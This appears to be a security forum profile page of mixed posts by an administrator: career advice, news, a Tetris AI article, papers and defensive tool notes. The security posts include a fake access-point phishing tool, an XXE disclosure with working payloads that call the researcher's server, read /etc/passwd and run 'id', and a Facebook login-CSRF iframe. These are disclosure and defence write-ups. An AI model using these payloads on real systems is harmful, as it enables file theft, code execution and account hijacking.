Nytro

Administrators
  • Posts: 18785
  • Joined
  • Last visited
  • Days Won: 738

Everything posted by Nytro

  1. https://www.youtube.com/watch?v=ZWM74Pf_Kd0 Old school. A dedication for texan. :->
  2. Such people do exist, people who have barely finished university (regardless of their grades) and expect salaries of thousands of euros. On top of that, if you look at their CV you won't see a single project or any activity they were involved in, so zero experience. I hope you will be realistic, so you don't get slapped down hard. Life is tough. Even if you see news like this everywhere, don't expect people to throw money at you. Look over your own CV and think from the employer's point of view. Ask yourselves how much someone with a CV like yours would be worth. I started at 1,600 RON and it was fine, because I had also had lower offers. Then it grew, little by little. If you are patient and keep learning, things will be much easier later on. Even when I got my first job I applied to about 80 companies, about 15 called me back, and I actually had plenty of projects in my CV.

Also, if you are employed at a company, you are not paid well, there has been no raise for a long time and you are not learning much either, my suggestion is to look for work elsewhere. Mind you, finding a job is not easy either. You may be thinking "hey, I'm smart, the rest are idiots", but you will see it is not quite like that. Anyway, you can be the Einstein of programming: if someone shows up asking for less than you, that someone may be the one who gets hired. I have seen people come to interviews who did not know what TCP or UDP is, who could not run a `cat` on Linux and who could not print the numbers on the main diagonal of a square matrix. Yet they had salary expectations. Don't be suckers either, though. If you do well at an interview, ask for more than you think you deserve. If that is not possible, they may tell you "We can't offer that much, but we can offer this much", or they will kick you out the door. Several things matter: which company it is, how you did at the interview, how the others did and, very importantly, the period in which you want to get hired.

If you want to get hired in the summer, guess what, a few thousand other students want to do the same thing. I once went to a C++ interview at a company and answered pretty much every question perfectly (they were trivial anyway: virtual functions and other simple things) and, honestly, it seemed to me that I knew more than my interviewers. They never called back. Then I went to a C++ and algorithms interview, got somewhat tangled up in the algorithms part (I still have work to do there) and, guess what, they called me and made an offer higher than what I had asked for. One more thing: if you get a big salary right from the start, say over 30-35-40 million old lei (roughly 3,000-4,000 RON), consider the following possibility: "these people are probably not going to give me a raise any time soon". Then there is the contract to take into account, because you may not be able to leave the company for some 2 years if they pay you well from the start. Suggestion: read the labor code, it will help you. Damn, I have rather mixed up my ideas, but you get what I meant.
  3. Nytro

    Fun stuff

    Viața la birou: 15 experiențe inevitabile prin care toți trecem la locul de muncă | adevarul.ro ("Office life: 15 inevitable experiences we all go through at work")
  4. The most sought-after job in Romania: salaries climb to 6,000 euros, unemployment does NOT exist, thousands of positions stay unfilled

Alice Gheorghe, 28 Jan 2014

The programmer profession sits at the top of the recruitment channels' lists, companies fight hard battles to attract and retain specialists, and top salaries for this position exceed the average Romanian income 10-15 times over. WALL-STREET.RO shows you everything you need to know about one of the best-paid professions with the most potential in Romania.

There are over 60,000 IT specialists on the Romanian market, more than half of them programmers, according to data from IT recruitment company Temps. "Around 5,000-6,000 new positions are created each year, but the supply of candidates is limited to 2,000-3,000 new graduates," Gabriela Dan, CEO of Temps, an IT recruitment company that is part of the Rinf Outsourcing Solutions group, told WALL-STREET.RO. Beyond that, the newly opened positions get filled through candidates moving from one company to another.

Programmers, the most sought-after IT specialists

Accordingly, most of the jobs available in the databases of recruitment agencies and sites are in IT, and these in turn are generally dominated by programmer positions. "40% of hiring requests in the IT area are for programmers," said Bogdan Florea, general manager of recruitment company Trenkwalder. "Given the technological boom of the last 5 years, which brought new programming languages to the fore, the programmer profession occupies a top spot. This is driven by the need to build IT applications and platforms that will replace the classic information systems," explained Cristina Savuica, head of recruitment company Lugera.

Among programmers themselves there is also a ranking of the most sought-after specializations: at the moment Java developers are in highest demand on the local market, followed by C++ and Mobile (Android and iOS). "Programmers of enterprise solutions are the most sought after, given the wide scope this type of project can reach. Lately Java Enterprise (J2EE) has been the preferred language for most of these projects, seconded by Microsoft solutions such as ASP.NET and .NET. We are also seeing rapidly growing demand for programmers with at least theoretical experience in Big Data or Cloud services. According to LinkedIn studies, since 2008 demand has grown 3,440-fold for Big Data and 195-fold for Cloud services," Savuica detailed.

How much a programmer earns in Romania

If you have solid theoretical grounding in the field and are a graduate of automation, cybernetics or computer science, you can already start thinking about a salary most Romanians do not even dream of. Your chances improve if you got involved in programming projects while still in university. While a beginner can earn 500-600 euros at a first job (which is not at all little for the local market), the salary of a professional in the field can climb to 6,000 euros a month. "An entry-level programmer starts from an average salary of 700 euros, a junior in the field, with 1-3 years of experience, earns around 1,000 euros, and a specialist with 3-6 years of experience climbs to 2,000 euros a month. Seniors end up earning as much as 6,000 euros a month," said representatives of recruitment company Adecco.

So, in a market with big temptations, turnover in this position is quite high. "Given that the market offers very many financial 'temptations', it is quite hard to retain people in a company if you don't also have solid development programs. On PHP positions, for example, there is very, very high turnover, with good programmers being called at least twice a week by a potential job offerer," noted Gabriela Dan, CEO of Temps. Developers are lured with generous financial packages, plus various bonuses depending on performance.

How to make yourself wanted on this market

"A programmer without experience should take as many online courses and certifications as possible. They should also build up experience by signing up on established programming-project sites, taking on and completing small projects which nevertheless add up to a body of demonstrable, project-based experience," advise the Adecco specialists. Also important is acquiring the business knowledge needed to see the impact of the solutions you develop on both users and the business. "It is important to gain an overview of how the different system architectures fit together," according to Lugera.

What employers look for and cannot find

Those considering a career in programming today should know that there are a few specializations for which employers struggle to find suitable candidates. Recruiters mention a series of hard-to-fill specializations, among them Java programmers (especially Java Mobile), C++, and exotic technologies like Hadoop and Magento. "Hard to fill are also the specializations with minimal salaries, because an IT specialist joins and stays at a company if it has a good reputation, if it invests in its people and in certifications for them, if it gives them access to high-performance technologies," say the Adecco specialists.

Romanian specialists are wanted abroad too

A top company, the experience of a job in another culture and, not least, a considerable salary can tempt young people who receive an offer from abroad. "Some foreign companies offer collaborative remote-working solutions to address the needs of distributed programmer teams. Companies from abroad offer attractive opportunities and are willing to grant considerable benefits to the most innovative programmers. They usually go after the brightest young university graduates, or target innovative leaders with refined IT experience. Big global technology players such as Google and Apple attract young programmers who achieve outstanding results in the various IT contests, educational programs and conferences these firms organize online," explained Cristina Savuica.

Most young people go abroad for a few years of experience, always planning to return home. "Big companies like Google, Facebook, Apple, Microsoft attract people easily, thanks to the names behind them, here too; but Romanian programmers are not thinking of settling abroad permanently. They do it for a few years, save the money needed for a comfortable independence back home, and return to the mioritic plains," said Gabriela Dan.

The future sounds good

Whether they choose to go abroad or specialize at home, programmers seem to have a job guaranteed for many years to come. The market keeps growing and, despite the economic crisis, salaries remain just as good. In 2014 most IT companies will be hiring, according to Temps data and the announcements issued by these companies; the biggest employers will be Microsoft, Dell, Endava, Luxoft, IBM, Oracle and Deutsche Bank. Moreover, an important point for this field is that the Romanian state has offered an aid plan to seven companies planning to hire around 1,000 programmers in Romania this year, among them Microsoft, Dell and Deutsche Bank.

Source: Cel mai dorit job din Romania: salariul urca la 6.000 de euro, somajul NU exista, mii de locuri raman neocupate
  5. Really nice video collection. Sticky.
  6. Sales in RST Market may only be made by members with 50+ posts. One-week ban.
  7. Applying Artificial Intelligence to Nintendo Tetris

Abstract

In this article, I explore the deceptively simple mechanics of Nintendo Tetris. Afterwards, I describe how to build an AI that exploits them.

Table of Contents: Abstract, Table of Contents, Try It Yourself, About, Preliminaries, Download, Run, Configuration, The Mechanics of Nintendo Tetris, Representing Tetriminos, Rotating Tetriminos, Spawning Tetriminos, Picking Tetriminos, Shifting Tetriminos, Dropping Tetriminos, Slides and Spins, Level 30 and Beyond, Lines and Statistics, Coloring Tetriminos, Game Mode, Legal Screen, Demo, The Kill Screen, Endings, 2 Player Versus, Music and Sound Effects, Play States and Render Modes, The Algorithm, Overview, Searching for Lock, Evaluation Function, Other Factors, AI Training, Java Version, About, Packages, AI Classes and Interfaces, Invoking the AI, Displaying the Playfield, Other Projects, Gamepad Version

Try It Yourself

About

For those lacking the persistence, patience and time necessary to master Nintendo Tetris, I created an AI to play it for you. Finally, you can experience level 30 and beyond. You can witness the score max out while the line, level and statistics counters wrap around indefinitely. Find out what colors appear in levels higher than any human has ever reached. Discover how long it can go.

Preliminaries

To run the AI, you'll need FCEUX, the all-in-one NES/Famicom emulator. The AI was developed for FCEUX 2.2.2, the most recent version at the time of this writing. You'll also need the Nintendo Tetris ROM file (USA version). Google might be able to help you track it down.

Download

Extract lua/NintendoTetrisAI.lua from this source zip.

Run

Start up FCEUX. From the menu bar, select File | Open ROM... In the Open File dialog box, select the Nintendo Tetris ROM file and press Open. The game will launch. From the menu bar, select File | Lua | New Lua Script Window... In the Lua Script window, enter the path to NintendoTetrisAI.lua or hit the Browse button to navigate to it. Finally, press Run. The Lua script will direct you to the first menu screen. Leave the game type as A-Type, but feel free to change the music using the arrow keys. On slower computers, the music may play choppily; you might want to disable it completely. Press Start (Enter) to advance to the next menu screen. In the second menu, you can change the starting level using the arrow keys. Press Start to begin the game. The AI will take over from there.

From the second menu screen, after you select the level, if you hold down gamepad button A (use Config | Input... to modify the keyboard mapping) and press Start, the resulting starting level will be 10 plus the selected value. The highest starting level is 19.

Article: Applying Artificial Intelligence to Nintendo Tetris
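The article's table of contents points at the heart of the approach: the AI searches for every position where the current piece can lock, then scores the resulting playfields with an evaluation function. As a rough illustration of what such a function computes, here is a Python sketch; the feature set and weights below are my own illustrative guesses, not the article's actual trained values.

```python
# Sketch of a Tetris board evaluation function.
# The features (cleared lines, holes, heights, bumpiness) are typical of
# lock-search Tetris AIs; the weights are made-up placeholders.
def evaluate(board):
    """board: list of rows (top to bottom), each a list of 0/1 cells."""
    height, width = len(board), len(board[0])
    heights = []   # per-column stack height
    holes = 0      # empty cells buried under a filled cell
    for x in range(width):
        col = [board[y][x] for y in range(height)]
        if 1 in col:
            top = col.index(1)
            heights.append(height - top)
            holes += col[top:].count(0)
        else:
            heights.append(0)
    complete = sum(1 for row in board if all(row))
    bumpiness = sum(abs(a - b) for a, b in zip(heights, heights[1:]))
    # Higher is better: reward clears, penalize holes and tall/uneven stacks.
    return 10 * complete - 8 * holes - sum(heights) - bumpiness

board = [
    [0, 0, 0, 0],
    [1, 1, 1, 1],
    [1, 0, 1, 1],
]
print(evaluate(board))
```

The real AI simulates all reachable lock positions for the current piece (including slides and spins) and commits to the placement whose resulting board scores best.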
  8. Nytro

    injdmp

This is a project I started in order to learn C. injdmp detects injected processes by searching for memory marked as RWX, DLLs loaded via the AppInit_DLLs & AppCertDlls registry values, dummy processes, and MZ headers in memory marked as RWX. In the extra dir there is some code for detecting threads running in memory space marked as RWX. See the website for usage details. Disclaimer: Use at your own risk.

Owner: Alexander Hanel
Website: http://hooked-on-mne…
Size: 100.7 KB (download)

Source: https://bitbucket.org/Alexander_Hanel/injdmp
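injdmp itself is C code against the Win32 API, but the core trick it describes, walking a process's address space and flagging committed RWX regions, can be sketched with Python's ctypes. This is a hedged approximation: the structure layout is simplified relative to the real Win32 definition, the helper names are mine, and the scan only actually runs on Windows.

```python
import ctypes
import sys

PAGE_EXECUTE_READWRITE = 0x40   # the "RWX" protection injdmp hunts for
MEM_COMMIT = 0x1000

class MEMORY_BASIC_INFORMATION(ctypes.Structure):
    # Simplified layout of the Win32 structure filled in by VirtualQueryEx.
    _fields_ = [
        ("BaseAddress", ctypes.c_void_p),
        ("AllocationBase", ctypes.c_void_p),
        ("AllocationProtect", ctypes.c_ulong),
        ("RegionSize", ctypes.c_size_t),
        ("State", ctypes.c_ulong),
        ("Protect", ctypes.c_ulong),
        ("Type", ctypes.c_ulong),
    ]

def is_rwx(state, protect):
    """Committed and readable+writable+executable: a classic injection smell."""
    return state == MEM_COMMIT and protect == PAGE_EXECUTE_READWRITE

def scan_rwx(pid):
    """Yield (base, size) for every committed RWX region of process `pid`."""
    k32 = ctypes.windll.kernel32
    handle = k32.OpenProcess(0x0400 | 0x0010, False, pid)  # QUERY_INFO | VM_READ
    mbi = MEMORY_BASIC_INFORMATION()
    addr = 0
    while k32.VirtualQueryEx(handle, ctypes.c_void_p(addr),
                             ctypes.byref(mbi), ctypes.sizeof(mbi)):
        if is_rwx(mbi.State, mbi.Protect):
            yield mbi.BaseAddress, mbi.RegionSize
        addr = (mbi.BaseAddress or 0) + mbi.RegionSize
    k32.CloseHandle(handle)

if sys.platform == "win32":   # the Win32 calls only exist on Windows
    for base, size in scan_rwx(ctypes.windll.kernel32.GetCurrentProcessId()):
        print(hex(base), size)
```

A legitimate JIT also allocates RWX pages, so (as with injdmp) hits are leads to inspect, not verdicts.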
  9. Static Analysis by Elimination

Pavle Subotic (Uppsala University, Sweden), Andrew E. Santosa (Oracle Labs, Australia), and Bernhard Scholz (University of Sydney, Australia)

Abstract. In the past, elimination-based data flow analysis algorithms have been proposed as an alternative to iterative algorithms for solving dataflow problems. Elimination-based algorithms exhibit a better worst-case runtime performance than iterative algorithms. However, the implementation of elimination-based algorithms is more challenging and iterative algorithms have been sufficient for solving standard data-flow problems in compilers. For more generic abstract interpretation frameworks, it has not been explored whether elimination-based algorithms are useful. In this paper we show that elimination-based algorithms are useful for implementing abstract interpretation frameworks for low-level programming languages. We demonstrate the feasibility of our approach with a range analysis developed in the LLVM framework. We supplement this work with a range of experiments conducted on several test suites.

Download: http://user.it.uu.se/~pasu4571/bytecode13.pdf
  10. Defending Against Tor-Using Malware, Part 1

11:48 pm (UTC-7) | by Jay Yaneza (Technical Support)

In the past few months, the Tor anonymity service has been in the news for various reasons. Perhaps most infamously, it was used by the now-shuttered Silk Road underground marketplace. We delved into the topic of the Deep Web in a white paper titled Deepweb and Cybercrime. In our 2014 predictions, we noted that cybercriminals would go deeper underground – and part of that would be using Tor in greater numbers. Cybercriminals are clearly not blind to the potential of Tor, and network administrators have to consider that Tor-using malware might show up on their network. How should they react to this development?

What's Tor, anyway?

Tor is designed to solve a fairly specific problem: to stop a man-in-the-middle (such as network administrators, ISPs, or even countries) from determining or blocking the sites that a user visits. How does it do this? Previously known as "The Onion Router", Tor is an implementation of the concept of onion routing, in which a number of nodes located on the Internet serve as relays for Internet traffic. A user who wants to use the Tor network installs a client on their machine. This client contacts a Tor directory server, from which it gets a list of nodes. The user's Tor client then selects a path for the network traffic via the various Tor nodes to the destination server. This path is meant to be difficult to follow. In addition, all traffic between nodes is encrypted. (More details about Tor may be found at the official website of the Tor project.) In effect, this hides your identity (or at least, your IP address) from the site you visited, as well as from any potential attackers inspecting your network traffic along the way. This is quite useful if you're a visitor who wants to cover your tracks or if, for some reason, the server that you're trying to connect to denies connections from your IP address.
This can be done for both legitimate and illegitimate reasons. Unfortunately, this means that it can be, and already has been, used for malicious purposes.

How can it be used maliciously?

Malware can use Tor just as easily as anyone else. In the second half of 2013, we saw more malware making use of it to hide its network traffic. In September, we blogged about the Mevade malware that downloaded a Tor component for backup command-and-control (C&C) communication. In October 2013, Dutch police arrested four persons behind the TorRAT malware, a malware family which also used Tor for its C&C communication. This malware family targeted the bank accounts of Dutch users, and investigation was difficult because of the use of underground crypting services to evade detection and the use of cryptocurrencies (like Bitcoin). In the last weeks of 2013, we saw ransomware variants calling themselves Cryptorbit that explicitly asked the victim to use the Tor Browser (a browser bundle pre-configured for Tor) when paying the ransom. (The name may have been inspired by the notorious CryptoLocker malware, which exhibits similar behavior.)

Figure 1. Warning from Tor-using ransomware

Earlier this month, we discussed several ZBOT samples that, in addition to using Tor for their C&C connection, also embed a 64-bit version "inside" the normal, 32-bit version.

Figure 2. Running 64-bit ZBOT malware

This particular malware runs perfectly in a 64-bit environment and is injected into the running svchost.exe process, as is typically the case with injected malware. This increase in Tor-using malware means that network administrators may want to take additional steps to be aware of Tor: how to spot its usage and (if necessary) prevent its use. Illegitimate usage of Tor could result in various problems, ranging from circumvented IT policies to exfiltrated confidential information. We will discuss these potential steps in a succeeding blog post.
Source: Defending Against Tor-Using Malware, Part 1 | Security Intelligence Blog | Trend Micro
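The onion-routing idea the post describes, where each relay peels off one encryption layer and learns only its own slice of the path, can be shown with a toy sketch. The XOR "cipher" here is a deliberate stand-in so the example stays self-contained; real Tor negotiates proper symmetric keys with each relay.

```python
import json

def xor(data: bytes, key: bytes) -> bytes:
    # Toy stand-in for a real cipher; XOR like this is NOT secure.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def build_onion(payload: bytes, route):
    """route: list of (relay_name, key) from entry to exit.
    Wrap the payload in one encryption layer per relay, innermost = exit."""
    packet = payload
    for name, key in reversed(route):
        layer = json.dumps({"hop": name, "data": packet.hex()}).encode()
        packet = xor(layer, key)
    return packet

def peel(packet: bytes, key: bytes):
    """What a single relay does: strip exactly one layer with its own key."""
    layer = json.loads(xor(packet, key))
    return layer["hop"], bytes.fromhex(layer["data"])

route = [("guard", b"key1"), ("middle", b"key2"), ("exit", b"key3")]
onion = build_onion(b"GET / HTTP/1.1", route)
for name, key in route:       # each relay peels one layer and forwards the rest
    hop, onion = peel(onion, key)
    assert hop == name        # a relay learns only its own position
print(onion)                  # only after the last peel is the request visible
```

This is why a network observer between any two relays sees only encrypted bytes and the next hop, which is precisely what makes Tor-using malware hard to inspect at the perimeter.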
  11. [h=2]PwnSTAR: Pwn SofT Ap scRipt[/h]

A bash script to launch a fake AP, configurable with a wide variety of attack options. It includes a number of index.html and server PHP scripts for sniffing and phishing, can act as a multi-client captive portal using PHP and iptables, and launches classic exploits such as evil-PDF.

Features:
- takes care of configuration of interfaces, macspoofing, airbase-ng and isc-dhcp-server
- steals WPA handshakes
- phishes email credentials
- serves webpages: supplied (e.g. hotspot, below) or provide your own
- sniffing with ferret and sslstrip
- adds a captive portal to the frontend of the fake AP
- assorted exploits
- de-auth with MDK3, aireplay-ng or airdrop-ng

Use your imagination, craft your own webpages, and have fun. You can download the PwnSTAR script from here and save it to your desktop.

Source: Hacking Articles | Raj Chandel's Blog: PwnSTAR: Pwn SofT Ap scRipt
  12. Detecting Custom Memory Allocators in C Binaries

Xi Chen, Asia Slowinska, Herbert Bos (Vrije Universiteit Amsterdam, The Netherlands)

Abstract—Many reversing techniques for data structures rely on the knowledge of memory allocation routines. Typically, they interpose on the system's malloc and free functions, and track each chunk of memory thus allocated as a data structure. However, many performance-critical applications implement their own custom memory allocators. Examples include webservers, database management systems, and compilers like gcc and clang. As a result, current binary analysis techniques for tracking data structures fail on such binaries. We present MemBrush, a new tool to detect memory allocation and deallocation functions in stripped binaries with high accuracy. We evaluated the technique on a large number of real world applications that use custom memory allocators. As we show, we can furnish existing reversing tools with detailed information about the memory management API, and as a result perform an analysis of the actual application-specific data structures designed by the programmer. Our system uses dynamic analysis and detects memory allocation and deallocation routines by searching for functions that comply with a set of generic characteristics of allocators and deallocators.

Download: http://www.cs.vu.nl/~herbertb/papers/membrush_wcre13.pdf
  13. Revisiting XXE and abusing protocols

Recently a security researcher reported a bug in Facebook that could potentially allow Remote Code Execution (RCE). His writeup of the incident is available here if you are interested. The thing that caught my attention about his writeup was not the fact that he had pwned Facebook or earned $33,500 doing it, but the fact that he used OpenID to accomplish this. After a quick look at the output from the PoC and rereading the vulnerability description, I had a pretty good idea of how the vulnerability was triggered and decided to see if any other platforms were vulnerable.

The basic premise behind the vulnerability is that when a user authenticates with a site using OpenID, that site does a 'discovery' of the user's identity. To accomplish this the server contacts the identity server specified by the user, downloads information regarding the identity endpoint and proceeds with authentication. There are two ways that a site may do this discovery process: either through HTML or a YADIS discovery. Now this is where it gets interesting. HTML look-up is simply an HTML document with some meta information contained in the head tags:

<head> <link rel="openid.server" href="http://www.example.com/myendpoint/" /> <link rel="openid2.provider" href="http://www.example.com/myendpoint/" /> </head>

Whereas the YADIS discovery relies on an XRDS document:

<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns:openid="http://openid.net/xmlns/1.0" xmlns="xri://$xrd*($v*2.0)"> <XRD> <Service priority="0"> <Type>http://openid.net/signon/1.0</Type> <URI>http://198.x.x.143:7804:/raw</URI> <openid:Delegate>http://198.x.x.143:7804/delegate</openid:Delegate> </Service> </XRD> </xrds:XRDS>

If you have been paying attention, the potential for exploitation should be jumping out at you. XRDS is simply XML and, as you may know, when XML is used there is a good chance that an application may be vulnerable to exploitation via XML External Entity (XXE) processing.
XXE is explained by OWASP and I'm not going to delve into it here, but the basic premise behind it is that you can specify entities in the XML DTD that get interpreted and 'executed' when processed by an XML parser. From the description given by Reginaldo, the vulnerability would be triggered by having the victim (Facebook) perform the YADIS discovery against a host we control. Our host would serve a tainted XRDS, and our XXE would be triggered when the document was parsed by our victim. I whipped together a little PoC XRDS document that would cause the target host to request a second file (198.x.x.143:7806/success.txt) from a server under my control. I ensured that the tainted XRDS was well-formed XML and would not cause the parser to fail (a quick check can be done by using XML Validation: XML Validation)

<?xml version="1.0" standalone="no"?> <!DOCTYPE xrds:XRDS [ <!ELEMENT xrds:XRDS (XRD)> <!ATTLIST xrds:XRDS xmlns:xrds CDATA "xri://$xrds"> <!ATTLIST xrds:XRDS xmlns:openid CDATA "http://openid.net/xmlns/1.0"> <!ATTLIST xrds:XRDS xmlns CDATA "xri://$xrd*($v*2.0)"> <!ELEMENT XRD (Service)*> <!ELEMENT Service (Type,URI,openid:Delegate)> <!ATTLIST Service priority CDATA "0"> <!ELEMENT Type (#PCDATA)> <!ELEMENT URI (#PCDATA)> <!ELEMENT openid:Delegate (#PCDATA)> <!ENTITY a SYSTEM 'http://198.x.x.143:7806/success.txt'> ]> <xrds:XRDS xmlns:xrds="xri://$xrds" xmlns:openid="http://openid.net/xmlns/1.0" xmlns="xri://$xrd*($v*2.0)"> <XRD> <Service priority="0"> <Type>http://openid.net/signon/1.0</Type> <URI>http://198.x.x.143:7806/raw.xml</URI> <openid:Delegate>http://198.x.x.143:7806/delegate</openid:Delegate> </Service> <Service priority="0"> <Type>http://openid.net/signon/1.0</Type> <URI>&a;</URI> <openid:Delegate>http://198.x.x.143:7806/delegate</openid:Delegate> </Service> </XRD> </xrds:XRDS>

In our example the first <Service> element would parse correctly as a valid OpenID discovery, while the second <Service> element contains our XXE in the form of <URI>&a;</URI>.
To test this we spun up a standard LAMP instance on DigitalOcean and followed the official installation instructions for a popular, open-source social platform that allowed OpenID authentication. And then we tried out our PoC.

"Testing for successful XXE"

It worked! The initial YADIS discovery (orange) was done by our victim (107.x.x.117) and we served up our tainted XRDS document. This resulted in our victim requesting the success.txt file (red). So now we knew we had some XXE going on. Next we needed to turn this into something a little more useful and emulate Reginaldo's Facebook success. A small modification was made to our XXE payload by changing the entity declaration for our 'a' entity as follows: <!ENTITY a SYSTEM 'php://filter/read=convert.base64-encode/resource=/etc/passwd'>. This causes the PHP filter function to be applied to our input stream (the file read) before the text is rendered. This served two purposes: firstly, to ensure the file we were reading did not introduce any XML parsing errors, and secondly, to make the output a little more user friendly.

The first run with this modified payload didn't yield the expected results and simply resulted in the OpenID discovery being completed and my browser trying to download the identity file. After a quick look at the URL, I realised that OpenID expected the identity server to automatically instruct the user's browser to return to the site which initiated the OpenID discovery. As I'd just created a simple python web server with no intelligence, this wasn't happening. Fortunately this behaviour could be emulated by hitting 'back' in the browser and then initiating the OpenID discovery again. Instead of attempting a new discovery, the victim host would use the cached identity response (with our tainted XRDS) and the result was returned in the URL.

"The simple python webserver didn't obey the redirect instruction in the URL and the browser would be stuck at the downloaded identity file."
"Hitting the back button and requesting OpenID login again would result in our XXE data being displayed in the URL."

Finally, all we needed to do was base64-decode the result from the URL and we had the contents of /etc/passwd.

"The decoded base64 string yielded the contents of /etc/passwd"

This left us with the ability to read *any* file on the filesystem, granted we knew the path and that the web server user had permission to access that file. In the case of this particular platform, an interesting file to read would be config.php, which yields the admin username+password as well as the MySQL database credentials.

The final trick was to try to turn this into RCE, as was hinted at in the Facebook disclosure. As the platform was written in PHP we could use the expect:// handler to execute code: <!ENTITY a SYSTEM 'expect://id'>, which should execute the system command 'id'. One dependency here is that the expect module is installed and loaded (PHP: Installation - Manual). Not too sure how often this is the case, but other attempts at RCE haven't been too successful. Armed with our new XRDS document we reenacted our steps from above and ended up with some code execution.

"RCE - retrieving the current user id"

And Boom goes the dynamite. All in all a really fun vulnerability to play with, and a good reminder that data validation errors don't just occur in the obvious places. All data should be treated as untrusted and tainted, no matter where it originates from. To protect against this form of attack in PHP, the following should be set when using the default XML parser: libxml_disable_entity_loader(true); A good document with PHP security tips can be found here: Injection Attacks — Survive The Deep End: PHP Security :: v1.0a1

./et

Source: SensePost Blog
  14. Nytro

    Fun stuff

    The World's Worst Penetration Test Report by #ScumbagPenTester "MySQL configured to allow connections from 127.0.0.1. Recommend configuration change to not allow remote connections." "Fixing the configuration will no longer allow evil connections by evil connection for configuration of server."
  15. [h=3]Two "WontFix" vulnerabilities in Facebook Connect[/h]

TL;DR Every website with "Connect Facebook account and log in with it" is vulnerable to account hijacking. Every website relying on signed_request (for example the official JS SDK) is vulnerable to account takeover, as soon as an attacker finds a 302 redirect to another domain. I don't think these will be fixed, as I've heard from the Facebook team that fixing them would break compatibility. I really wish they would fix them though; as you can see below, I feel these are serious issues. I understand the business reasons why they might choose otherwise, but from my perspective, when you have to choose between security and compatibility, the former is the right bet. Let me quickly describe what these bugs are and how you can protect your websites.

CSRF on facebook.com login to hijack your identity

It's a higher-level variant of the most common OAuth vulnerability (we attach the Attacker's social account to the Victim's client account), but here even Clients using "state" to prevent CSRF are vulnerable.

<iframe name="playground" src='data:text/html,<form id="genform" action="https://www.facebook.com/login.php" method="POST"><input type="hidden" name="email" value="homakov@gmail.com"><input type="hidden" name="pass" value="password"></form><script>genform.submit()</script>'></iframe>

FYI, we need the data: trick to get rid of the Referer header; Facebook rejects requests with cross-domain Referers. This form logs the victim into an arbitrary account of the attacker's (even if the user is already logged in; the logout procedure is trivial). From then on, Facebook will respond to all OAuth flows with the Attacker's profile information and the Attacker's uid. Every website with "Connect your Facebook to your main account to log in faster" functionality is vulnerable to account hijacking, as long as the attacker can replace your identity on Facebook with his identity and connect his Facebook account to the victim's account on the website just by loading the CLIENT/fb/connect URL.
Once again: even if we cannot inject our code into the callback because of state protection, we can re-login the user and make Facebook do all the work for us! Almost all server-side libraries and implementations are "vulnerable" (they are not; it's Facebook who's vulnerable!): omniauth, django-social-auth, etc. And yes, the official facebook-php-sdk. (By the way, I found two bugs in omniauth-facebook: state fixation and an authentication bypass. Update if you haven't yet.)

Mitigation: require a CSRF token for adding a social connection. E.g. instead of /connect/facebook use /connect/facebook?authenticity_token=123qwe. It makes it impossible for an attacker to start the process by himself.

Facebook JS SDK and #signed_request. Since "redirect_uri" has been flexible on Connect since its creation, Facebook engineers made it a required parameter to obtain an "access_token" for an issued "code". If the code was issued for a different (spoofed) redirect_uri, the provider responds with a mismatch error. signed_request is a special, non-standard transport created by Facebook. It carries a "code" as well, but this code is issued for an empty redirect_uri = "". Furthermore, signed_request is sent in the #fragment, so it can be leaked easily with any 302 redirect to the attacker's domain. And guess what: the redirect can even be on a subdomain of our target! The attack surface gets so huge that you can no doubt find a redirecting endpoint on any big website. Basically, signed_request is exactly what the "code" flow is, but with leak protection turned off. All you need is to steal the victim's signed_request with a redirect to your domain (slice it from location.hash), then open the client website, put it in the fbsr_CLIENT_ID cookie and hit the client's authentication endpoint. Finally, you're logged in as the owner of that signed_request. It's just like stealing a username+password. Mitigation: it's hard to get rid of all the redirects.
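The CSRF-token mitigation described above (requiring an authenticity_token before starting the social-connect flow) can be sketched in a few lines. This is an illustrative stand-alone sketch, not Facebook's or any library's API; the function and parameter names are made up:

```python
import hmac
import secrets

def issue_authenticity_token(session: dict) -> str:
    """Store a random per-session token and return it for embedding in the page."""
    token = secrets.token_urlsafe(16)
    session["authenticity_token"] = token
    return token

def may_start_facebook_connect(session: dict, request_args: dict) -> bool:
    """Only begin the OAuth connect flow if the session's token round-trips intact.

    An attacker who force-logs the victim into his own Facebook account cannot
    guess this value, so he cannot trigger /connect/facebook by himself.
    """
    expected = session.get("authenticity_token")
    supplied = request_args.get("authenticity_token", "")
    # compare_digest avoids leaking the token through timing differences
    return bool(expected) and hmac.compare_digest(expected, supplied)
```

The key design point is that the token is bound to the victim's session on the client website, not to anything Facebook controls, so re-logging the victim into Facebook does not help the attacker.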
For example, Facebook clients like SoundCloud, Songkick and Foursquare are OAuth providers themselves, so they have to be able to redirect to third-party websites. Each redirect to their "sub" clients is also a threat of leaking Facebook's token. You can try adding #_=_ to "kill" the fragment part, but it's better to stop using signed_request (get rid of the JS SDK) and start using the (slightly more) secure code flow with the protections I mentioned above.

Conclusion: I'd recommend not using Facebook Connect in critical applications (nor any other OAuth provider). It's perhaps a suitable quick login for a social game, but never for a website with important data. Use old-school passwords instead. If you must use Facebook Connect, whitelist your redirect_uri in the app's settings and require user interaction (clicking a button) before adding a new connection. I really hope Facebook will change their mind, to stay a trustworthy identity provider. Author: Egor Homakov on 10:27 PM Sursa: Egor Homakov: Two "WontFix" vulnerabilities in Facebook Connect
  16. Spy agencies are slurping personal data from leaky mobile apps
by Lisa Vaas on January 29, 2014

The US' National Security Agency (NSA) and its UK counterpart, GCHQ, have been honing their data-slurping technologies to suck up whatever they can get from leaky smartphones, the Guardian reported on Tuesday. Beyond device details, data shared over the internet by iOS and Android apps can include personal information such as age, gender, and location, while some apps share even more sensitive user information, such as sexual preference or whether a given user might be a swinger. The Guardian, relying on top-secret documents handed over by whistleblower Edward Snowden, says that the spy guys are developing capabilities to milk this private information from apps as innocuous as the insanely popular Angry Birds game. Reporting in partnership with the New York Times and ProPublica, they revealed that the NSA and GCHQ have "extensive tools" ready to throw against iPhone, Android and other phone platforms.

The agencies also apparently think of Google Maps as a gold mine. The Guardian reports that one project involved intercepting Google Maps queries from smartphones to collect large volumes of location data. The newspaper quotes a 2008 document's gleeful assessment of the Google Maps work, in which it noted that "[i]t effectively means that anyone using Google Maps on a smartphone is working in support of a GCHQ system."

The documents suggest that, depending on how much information a user has provided in his or her profile on a given app, the agency could collect "almost every key detail of a user's life", the Guardian reports: home country, current location (through geolocation), age, gender, zip code, marital status - options included "single", "married", "divorced", "swinger" and more - income, ethnicity, sexual orientation, education level, and number of children.
